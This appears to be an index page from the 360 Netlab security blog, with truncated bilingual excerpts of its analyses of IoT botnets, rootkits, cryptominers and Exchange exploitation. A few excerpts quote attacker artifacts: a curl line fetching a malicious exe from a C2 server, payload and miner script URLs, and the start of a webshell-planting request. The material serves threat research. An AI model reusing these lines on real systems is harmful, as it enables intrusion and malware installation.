360 Netlab Blog - Network Security Research Lab at 360 (Page 3)

Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0 day to spread

Overview In July 2021 we blogged about Mirai_ptea, a botnet spreading through an undisclosed vulnerability in KGUARD DVR. At first we thought it was a short-lived botnet that would soon disappear so we just gave it a generic name. But clearly we underestimated the group behind this family, which

Mirai_ptea_Rimasuta变种正在利用RUIJIE路由器在野0DAY漏洞传播

版权版权声明：本文为Netlab原创，依据 CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。概述 2021年7月我们向社区公布了一个通过KGUARD DVR未公开漏洞传播的僵尸网络Mirai_ptea，一开始我们认为这是一个生命短暂的僵尸网络，不久就会消失不见，因此只给了它一个通用的名字。但很显然我们小看了这个家族背后的团伙，事实上该家族一直非常活跃，最近又观察到该家族正在利用RUIJIE NBR700系列路由器的在野0day漏洞传播。比较有意思的是，该家族的作者曾经在某次更新的样本中加入了这么一段话吐槽我们的mirai_ptea命名： -_- you guys didnt pick up on the name? really??? its ``RI-MA-SU-TA``. not MIRAI_PTEA this is dumb name. 出于对作者的"尊重"，以及对该团伙实力的重新评估，我们决定将其命名为Mirai_

The Mostly Dead Mozi and Its’ Lingering Bots

Background It has been nearly 2 years since we (360NETLAB) first disclosed the Mozi botnet in December 2019, and in that time we have witnessed its development from a small-scale botnet to a giant that accounted for an extremely high percentage of IOT traffic at its peak. Now that Mozi&

Mozi已死，余毒犹存

背景 360NETLAB于2019年12月首次披露了Mozi僵尸网络，到现在已有将近2年时间，在这段时间中，我们见证了它从一个小规模僵尸网络发展为巅峰时占据了极高比例IOT流量巨无霸的过程。现在Mozi的作者已经被执法机关处置，其中我们也全程提供了技术协助，因此我们认为后续在相当长的一段时间内它都不会继续更新。但我们知道，Mozi采用了P2P网络结构，而P2P网络的一大“优点”是健壮性好，即使部分节点瘫痪，整个网络仍然能工作。所以即使Mozi作者不再发布新的更新，它仍然会存活一段时间，残余的节点仍然会去感染其它存在漏洞的设备，所以我们现在仍然能看到Mozi在传播，正可谓“百足之虫，死而不僵”。许多安全厂商都对Mozi进行了跟踪分析，但从我们的角度而言，或多或少有些遗漏，甚至有错误。今天我们将对Mozi的看法总结在下面这篇文章里，以补充安全社区的分析；同时也为我们对Mozi僵尸网络的持续关注画上一个句号。本文将回答以下问题： 1：Mozi除Bot节点外还有别的功能节点吗？ 2：Mozi Bot模块有新功能吗？ 3：Mozi僵尸网络还在更新吗？ M

Import 2022-11-30 11:16

威胁快讯：TeamTNT新变种通过ELF打包bash脚本，正通过Hadoop ResourceManager RCE 传播

TeamTNT是一个比较活跃的挖矿家族，曾被腾讯和PAN等国内外安全厂商多次分析[1][2]，我们的BotMon系统也曾多次捕获。以往经验显示，TeamTNT家族喜欢使用新技术，比如名为EzuriCrypter的加密壳就是首次在TeamTNT样本中被检测到。近期，我们的Anglerfish蜜罐再次捕获到TeamTNT的新变种，使用了如下新技术和工具： 1. 通过ELF文件包装入口bash脚本。 2. 集成了一个新的Go编写的扫描器。从功能角度看，新变种和5月份曝光的版本相比并没有大的变化，只是在个别功能上做了一些有意思的调整。 Exploit 本轮传播使用了已知漏洞 Hadoop_ResourceManager_apps_RCE。入口脚本分析跟以往攻击相同，漏洞利用成功后会植入一个名为i.sh的入口脚本，内容如下：能看出这段脚本会从RT_URL变量中解码出主模块的URL hxxp://oracle.htxreceive.top/s3f715/i.jpg，然后下载并执行。 ELF打包的主模块分析主模块为一个ELF文件，代码看上去非

Mirai_ptea Botnet is Exploiting Undisclosed KGUARD DVR Vulnerability

Overview On 2021-06-22 we detected a sample of a mirai variant that we named mirai_ptea propagating through a new vulnerability targeting KGUARD DVR. Coincidently, a day later, on June 23, we received an inquiry from the security community asking if we had seen a new DDoS botnet, cross-referencing some

Mirai_ptea Botnet利用KGUARD DVR未公开漏洞报告

2021-06-22我们检测到一个我们命名为mirai_ptea的mirai变种样本通过未知漏洞传播。经过分析，该漏洞为KGUARD DVR未公开的漏洞。从我们的分析看该漏洞存在于2016年的固件版本中。我们能找到的2017年之后的固件厂家均已经修复该漏洞

被拦截的伊朗域名的快速分析

伊朗新闻网站被美国阻断的事成为了最近的新闻热点，报道的主要内容是：美国司法部查封36个伊朗的新闻网站，其中许多网站与伊朗的“虚假信息活动”有关。这些网站首页通知显示，根据美国法律，这些网站已被美国政府查封，通知上还附有美国联邦调查局和美国商务部产业安全局的印徽。到底哪些新闻站被拦截了，我们查询了几个新闻源都没有给出全部被拦截的网站列表。其实这种从域名角度做拦截的手段，总是会在大网的DNS/whois数据中留下踪迹。我们利用这些网络基础数据分析出了32+2个被拦截的伊朗新闻网站的域名，其中的2个域名是在今年3月和4月份被拦截的；通过技术分析，也确认这些修改是直接通过注册局进行的改动。被拦截的域名的详细列表见文末。分析我们拿其中被拦截的域名之一alalamtv.net 来做一个分析(见相关新闻报道)。 DNS记录从该域名出发，我们利用PassivedDNS记录可以看到，其NS服务器和IP地址在6月23号的凌晨3点40开始发生了变化，无论NS服务器还是IP地址都切换到了亚马逊的服务器。 whois记录先说结论：通过对不同域名的w

窃密者Facefish分析报告

背景介绍 2021年2月，我们捕获了一个通过CWP的Nday漏洞传播的未知ELF样本，简单分析后发现这是一个新botnet家族的样本。它针对Linux x64系统，配置灵活，并且使用了一个基于Diffie–Hellman和Blowfish的私有加密协议。但因为通过合作机构（在中国区有较好网络通信观察视野）验证后发现对应的C2通信命中为0，所以未再深入分析。 2021年4月26号，Juniper发布了关于此样本的分析报告，我们注意到报告中忽略了一些重要的技术细节，所以决定将漏掉的细节分享出来。该家族的入口ELF样本MD5=38fb322cc6d09a6ab85784ede56bc5a7是一个Dropper，它会释放出一个Rootkit。因为Juniper并未为样本定义家族名，鉴于Dropper在不同的时间点释放的Rootkit有不同的MD5值，犹如川剧中的变脸，并且该家族使用了Blowfish加密算法，我们将它命名为Facefish。 Facefish概览 Facefish由Dropper和Rootkit 2部分组成，主要功能由Rootkit模块决定。Rootki

Analysis report of the Facefish rootkit

Background In Feb 2021, we came across an ELF sample using some CWP’s Ndays exploits, we did some analysis, but after checking with a partner who has some nice visibility in network traffic in some China areas, we discovered there is literarily 0 hit for the C2 traffic. So

RotaJakiro, the Linux version of the OceanLotus

On Apr 28, we published our RotaJakiro backdoor blog, at that time, we didn’t have the answer for a very important question, what is this backdoor exactly for? We asked the community for clues and two days ago we got a hint, PE(Thanks!) wrote the following comment on

“双头龙”源自海莲花组织？

我们的双头龙blog发布后引起了较大反响，除了媒体转载，一些安全同行还纷纷在我们blog下面留言和提问，其中5月4号的一则留言提到双头龙跟海莲花（OceanLotus）样本的C2行为有联系：留言所提到的样本为一个zip打包文件，2016年就已出现。该zip可以解压出多个文件，那个名为Noi dung chi tiet（对应中文详细信息）的Mach-O格式可执行文件即是海莲花样本。对比分析显示该样本确实与双头龙样本存在多个相似之处，所以它们或许可以解开双头龙的身世之谜：它极可能是海莲花的Linux版本。本文主要从2进制代码层面介绍这些相似点。相似点1：C2会话建立函数 Linux常见的域名解析函数为gethostbyname()，但双头龙使用了相对小众的getaddrinfo()函数，C2域名的解析和会话建立都在一个函数中完成，而海莲花样本中也存在一个模式类似的相同功能的函数，2者的函数对比如下：能看出来它们不但功能相同，对sprintf()和getaddrinfo()的使用方式也几乎一模一样。此外，双头龙和海莲花都使用了单独的数据结构来保存C2会话信息，比如

Threat Alert: New update from Sysrv-hello, now infecting victims‘ webpages to push malicious exe to end users

Overview From the end of last year to now, we have see the uptick of the mining botnet families. While new families have been popping up, some old ones are get frequently updated. Our BotMon system has recently reported about the [rinfo][z0miner]. And the latest case comes from Sysrv-hello.

威胁快讯：Sysrv-hello再次升级，通过感染网页文件提高传播能力

版权版权声明: 本文为Netlab原创，依据 CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。概述从去年末到现在，挖矿类型的botnet家族一直活跃，除了新家族不断出现，一些老家族也频繁升级，主要是为了提高传播能力和隐蔽性，我们的 BotMon 系统对此多有检测[rinfo][z0miner]。最新的案例来自Sysrv-hello，本来近期已经有2家安全公司先后分析过该家族的新变种[1][2]，但文章刚出来sysrv的作者就在4月20号再次进行升级，增加了感染网页的能力，本文对此做一分析。新模块a.py和BrowserUpdate.exe 我们知道sysrv能同时感染Linux和Windows系统，其入口为一个脚本文件，Linux下为bash脚本，最常见的文件名是ldr.sh，Windows下为PowerShell脚本ldr.ps1，这次升级只在ldr.sh中检测到，bash脚本中添加了如下代码： curl $cc/BrowserUpdate.exe > /tmp/BrowserUpdate.exe curl

RotaJakiro: A long live secret backdoor with 0 VT detection

Overview On March 25, 2021, 360 NETLAB's BotMon system flagged a suspiciousELF file (MD5=64f6cfe44ba08b0babdd3904233c4857) with 0 VT detection, the sample communicates with 4 domains on TCP 443 (HTTPS), but the traffic is not of TLS/SSL. A close look at the sample revealed it to be a

双头龙(RotaJakiro)，一个至少潜伏了3年的后门木马

版权版权声明：本文为Netlab原创，依据 CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。概述 2021年3月25日，360 NETLAB的BotMon系统发现一个的VT 0检测的可疑ELF文件(MD5=64f6cfe44ba08b0babdd3904233c4857)，它会与4个业务类型截然不同的域名进行通信，端口均为TCP 443（HTTPS），但流量却并非TLS/SSL类型，这个异常行为引起了我们的兴趣，进一步分析发现它是一个针对Linux X64系统的后门木马，该家族至少已经存在3年但目前还是0检测。基于该家族使用rotate加密，并且运行后对root/non-root账户有不同的行为，犹如一只双头龙，一体双向，我们将它命名为RotaJakiro。 RotaJakiro隐蔽性较强，对加密算法使用比较多，包括：使用AES算法加密样本内的资源信息；C2通信综合使用了AES，XOR，ROTATE加密和ZLIB压缩算法。指令方面，RotaJakiro支持12种指令码，其中3种是和特定plugin相关的，遗憾的是目前我们并没有捕获到这类pay

Microsoft Exchange Vulnerability (CVE-2021-26855) Scan Analysis

Background On March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange server[1]。 We customized our Anglerfish honeypot to simulate and deploy Microsoft Exchange honeypot plug-in on March 3, and soon we started to see a large amount of related data, so far, we have already

Microsoft Exchange 漏洞（CVE-2021-26855）在野扫描分析报告

背景介绍 2021年3月2号，微软披露了Microsoft Exchange服务器的远程代码执行漏洞[1]。 2021年3月3号开始，360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件，很快我们搜集到大量的漏洞检测数据，目前我们已经检测到攻击者植入Webshell，获取邮箱信息，甚至进行XMRig恶意挖矿(http://178.62.226.184/run.ps1)的网络攻击行为。根据挖矿文件路径名特征，我们将该Miner命名为Tripleone。 2021年3月6号开始，ProjectDiscovery和微软CSS-Exchange项目相继披露了漏洞检测脚本[2][3]。 Microsoft Exchange服务器的远程代码执行漏洞利用步骤复杂，一般从PoC公布到黑色产业攻击者利用需要一定的时间，我们看到这个攻击现象已经开始了。 CVE-2021-26855 植入Webshell POST /ecp/j2r3.js HTTP/1.1 Host: {target} Connection: keep-alive

Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows & Linux

Overview Back in January, we blogged about a new botnet Necro and shortly after our report, it stopped spreading. On March 2nd, we noticed a new variant of Necro showing up on our BotMon tracking radar March 2nd, the BotMon system has detected that Necro has started spreading again, in

Import 2022-11-30 11:16

Necro再次升级，使用Tor+动态域名DGA 双杀Windows&Linux

版权版权声明：本文为Netlab原创，依据 CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。概述自从我们1月份公开Necro后不久，它就停止了传播，但从3月2号开始，BotMon系统检测到Necro再次开始传播。蜜罐数据显示本次传播所用的漏洞除了之前的TerraMaster RCE（CVE_2020_35665）和Zend RCE (CVE-2021-3007)，又加入了两个较新的漏洞Laravel RCE (CVE-2021-3129)和WebLogic RCE (CVE-2020-14882)，蜜罐相关捕获记录如下图所示。通过样本分析我们发现在沉寂一个月之后新版本的Necro有了较大改动，功能进一步加强，体现在： 1. 开始攻击Windws系统，并在Windows平台上使用Rootkit隐藏自身。 2. 更新了DGA机制，采用“子域名DGA+动态域名”的方法生成C2域名。 3. C2通信支持Tor，同时加入了一种新的基于Tor的DDoS攻击方法。 4. 能针对特定Linux目标传播Gafgyt_tor。 5. 能篡改受害

New Threat: ZHtrap botnet implements honeypot to facilitate finding more victims

Overview In the security community, when people talk about honeypot, by default we would assume this is one of the most used toolkits for security researchers to lure the bad guys. But recently we came across a botnet uses honeypot to harvest other infected devices, which is quite interesting. From

新威胁：ZHtrap僵尸网络分析报告

版权版权声明：本文为Netlab原创，依据 CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。概述从2021年2月28日起，360网络安全研究院的BotMon系统检测到IP(107.189.30.190)在持续传播一批未知ELF样本。经分析，我们确认这些样本隶属于一个新的botnet家族，结合其运行特点，我们将其命名为ZHtrap，本文对其做一分析，文章要点如下： 1. ZHtrap的传播使用了4个Nday漏洞，主要功能依然是DDoS和扫描，同时集成了一些后门功能。 2. Zhtrap能将被感染设备蜜罐化，目的是提高扫描效率。 3. Zhtrap感染受害主机后会禁止运行新的命令，以此实现彻底控制和独占该设备。 4. 在C2通信上，ZHtrap借鉴了套娃，采用了Tor和云端配置。 ZHtrap全情介绍 ZHtrap的代码由Mirai修改而来，支持x86, ARM, MIPS等主流CPU架构。但相对Mirai，ZHtrap变化较大，体现在如下方面： * 在指令方面，加入了校验机制 * 在扫描传播方面，增加了对真实设备和蜜

Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities

Overview In recent months, with the huge rise of Bitcoin and Monroe, various mining botnet have kicked into high gear, and our BotMon system detects dozens of mining Botnet attacks pretty much every day, most of them are old families, some just changed their wallets or propagation methods, and z0Miner

威胁快讯：z0Miner 正在利用 ElasticSearch 和 Jenkins 漏洞大肆传播

版权版权声明: 本文为Netlab原创，依据 CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。概述最近几个月受比特币、门罗币大涨的刺激，各种挖矿家族纷纷活跃起来，我们的 BotMon 系统每天都能检测到几十上百起的挖矿类 Botnet 攻击事件。根据我们统计，它们多数是已经出现过的老家族，有的只是换了新的钱包或者传播方式，z0Miner 就是其中一例。 z0Miner 是去年开始活跃的一个恶意挖矿家族，业界已有公开的分析。z0Miner 最初活跃时，利用 Weblogic 未授权命令执行漏洞进行传播。近期，360 网络安全研究院 Anglerfish 蜜罐系统监测到 z0Miner 又利用 ElasticSearch 和 Jenkins 的远程命令执行漏洞进行大肆传播，近期活跃趋势如下：漏洞利用情况 ElasticSearch RCE 漏洞 CVE-2015-1427 虽然是个

QNAP NAS users, make sure you check your system

Background On March 2, 2021, 360Netlab Threat Detection System started to report attacks targeting the widely used QNAP NAS devices via the unauthorized remote command execution vulnerability (CVE-2020-2506 & CVE-2020-2507)[1], upon successful attack, the attacker will gain root privilege on the device and perform malicious mining activities. Due to